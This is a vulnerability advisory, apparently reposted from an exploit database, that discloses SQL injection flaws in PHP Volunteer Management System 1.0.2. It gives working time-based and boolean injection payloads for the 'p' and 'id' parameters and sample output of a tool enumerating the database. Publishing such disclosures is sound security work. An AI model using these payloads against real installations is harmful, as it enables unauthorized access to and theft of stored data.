PHP Volunteer Management System 1.0.2 SQL Injection

2012.05.30

Credit: loneferret

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Title: PHP Volunteer Management System v 1.0.2 multiple SQLi Vulnerabilities
# Version: 1.0.2
# Author/Found by: loneferret
# Software Site: https://sourceforge.net/projects/phpvolunteer/
# Other vulnerabilities: http://www.exploit-db.com/exploits/18941/
   
# Date found: May 28th 2012
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23
   
# Vulnerability:
# Due to improper sanitation, many of the parameters are injectable,
# some need to be authenticated, others not.
 
   
# As always have fun...
 
PoC:
 
Page: index.php
Parameter: ?p=
Method: GET
Payload: /?p=dashboard' and sleep(5) and '1'='1
Payload: /?p=login' and sleep(5) and '1'='1
 
Other affected parameters can be found in the message section of
the application when reading or deleting a message.
 
Parameter: id=
Url: /?p=read_message&id=2
Payload: /?p=read_message&id=-1' or '1'='1
 
 
Possible output:
[10:00:02] [INFO] searching database 'bf102'
[10:00:02] [INFO] the SQL query used returns 1 entries
[10:00:02] [INFO] resumed: "bf102"
found databases [1]:                                 
[*] bf102

References:

https://sourceforge.net/projects/phpvolunteer/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PHP Volunteer Management System 1.0.2 SQL Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.